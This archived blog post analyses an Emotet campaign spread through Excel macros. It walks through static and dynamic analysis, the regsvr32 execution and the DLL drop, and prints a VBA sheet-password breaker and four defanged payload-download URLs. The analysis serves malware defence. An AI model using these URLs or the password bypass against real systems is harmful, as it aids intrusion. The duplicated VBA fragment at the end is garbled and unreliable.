Emotet Campaign:
By Ilan Duhin
Published: 2023-02-28 · Archived: 2026-04-05 21:08:32 UTC
Executive Summary:
5 min read
Feb 26, 2023
In the last months, there has been an extensive campaign in Europe, especially of malware that calls “Emotet”.
The malware arrives as an Excel file and tries to communicate with a number of URLs and in the end, download
four DLL files to the machine.
Emotet uses an API call of CreateDirectoryA to create a folder where the files will be saved locally on the
computer and from there run through Regsvr32.exe.
Press enter or click to view image in full size
Emotet Behavior
Static Analysis:
OLE Tools:
Press enter or click to view image in full size
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 1 of 15

Checking the file structure.
Press enter or click to view image in full size
Getting a clue that we have inside the excel 6 sheets.
Press enter or click to view image in full size
Checking the capabilities of the file by using malwoverview.py and get some clues.
Press enter or click to view image in full size
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 2 of 15

Get inside to the third stream and extract his strings.
Press enter or click to view image in full size
Find 4 suspicious URLs.
The file contains macro. In addition, find all cells that contains the whole code.
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 3 of 15

Dynamic Analysis:
First, we have try to open the excel (part of office 2021) we notice that it opened without
“Enable Content” pop up. after doing little research, the message shows just on 2007–2013 versions of office.
After then, Microsoft blocks the option of enabling running macros automatically.
Press enter or click to view image in full size
To enable macros we need to change the option like in the picture below:
** in office 2007/2013 it will run by clicking “Enable Content”
Press enter or click to view image in full size
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 4 of 15

Need to save and enter it again to an excel file.
And now…
Press enter or click to view image in full size
When we press on the button, four messages pops up.
Press enter or click to view image in full size
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 5 of 15

Press enter or click to view image in full size
child processes of Excel.
When clicking on regsvr32.exe you can see those macros using it to execute the malware. It acts like a dropper
because it generates a folder to place his DLL there.
Press enter or click to view image in full size
when opening Excel and following the static investigation, we see 6 sheets that was hiding from the victim.
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 6 of 15

Each sheet requires a password.
To extract the password, we use “password breaker for VBA”.
Source: https://www.instructables.com/VBA-Code-To-Unlock-A-Locked-Excel-Sheet/
Sub PasswordBreaker()
‘Breaks worksheet password protection.
Dim i As Integer, j As Integer, k As Integer
Dim l As Integer, m As Integer, n As Integer
Dim i1 As Integer, i2 As Integer, i3 As Integer
Dim i4 As Integer, i5 As Integer, i6 As Integer
On Error Resume Next
For i = 65 To 66: For j = 65 To 66: For k = 65 To 66
For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66
For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66
For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126
ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
Get Ilan Duhin’s stories in your inbox
Join Medium for free to get updates from this writer.
Remember me for faster sign in
Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 7 of 15

If ActiveSheet.ProtectContents = False Then
MsgBox “One usable password is “ & Chr(i) & Chr(j) & _
Chr(k) & Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & _
Chr(i3) & Chr(i4) & Chr(i5) & Chr(i6) & Chr(n)
Exit Sub
End If
Next: Next: Next: Next: Next: Next
Next: Next: Next: Next: Next: Next
End Sub
To insert our VBA code we need to press: ALT+F11, paste it and Run.
Press enter or click to view image in full size
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 8 of 15

paste the password breaker inside every sheet.
Excel shows us automatically the password for the requested sheet.
We can verify it from press right click and see that the sheet is “Protected”.
Sheet 1 data:
Press enter or click to view image in full size
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 9 of 15

Sheet 2 data:
Press enter or click to view image in full size
When we reorganize the strings we see four URL’s:
- URLDownloadToFileA”, “JCCB”, 0, “https://audioselec.c[o]m/about/dDw5ggtyMojggTqhc
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 10 of 15

- https://geringer-muehle.[de]/wp-admin/G/
- http://intolove.co.[uk]/wp-admin/FbGhiWtrEzrQ/
- http://isc.net.[ua]/themes/3rU/
Sheet 3 data:
Sheet 4 data:
Press enter or click to view image in full size
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 11 of 15

Another two URL’s that we saw earlier.
Sheet 5 data:
Press enter or click to view image in full size
Sheet 6 data:
Contains the directions of how to summarize the strings.
DLL Analysis:
Export function number 18.
Press enter or click to view image in full size
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 12 of 15

After funning the DLL we found a few interesting strings in the memory tab.
Press enter or click to view image in full size
In addition, it drops itself upon execution to the next path:
Press enter or click to view image in full size
When analyzing the memory string of the DLL in VT we got a description of Emotet.
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 13 of 15

Press enter or click to view image in full size
Press enter or click to view image in full size
Conclusions:
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 14 of 15

· The macros reach out to download & execute the Emotet malware.
· The excel file using macros to reach out to web URLs.
· Via regsvr32.exe Emotet doing his execution.
· Emotet dropper is downloaded to a randomly generated folder under %UserProfile%\Appdata\Local as a dll file.
Source: https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
https://medium.com/@Ilandu/emotet-campaign-6f240f7a5ed5
Page 15 of 15

Dim i As Integer, Dim l As Integer, j As Integer, m As Integer, k As Integer n As Integer 
Dim i1 As Integer, i2 As Integer, i3 As Integer 
Dim i4 As Integer, i5 As Integer, i6 As Integer 
On Error Resume Next  
For i = 65 To 66: For j = 65 To 66: For k = 65 To 66
For l = 65 To 66: For m = 65 To 66: For i1 = 65 To 66
For i2 = 65 To 66: For i3 = 65 To 66: For i4 = 65 To 66
For i5 = 65 To 66: For i6 = 65 To 66: For n = 32 To 126
ActiveSheet.Unprotect Chr(i) & Chr(j) & Chr(k) & _
Chr(l) & Chr(m) & Chr(i1) & Chr(i2) & Chr(i3) & _
Get Ilan Duhin’s stories in your inbox 
Join Medium for free to get updates from this writer.
Remember me for faster sign in  
Chr(i4) & Chr(i5) & Chr(i6) & Chr(n) 
   Page 7 of 15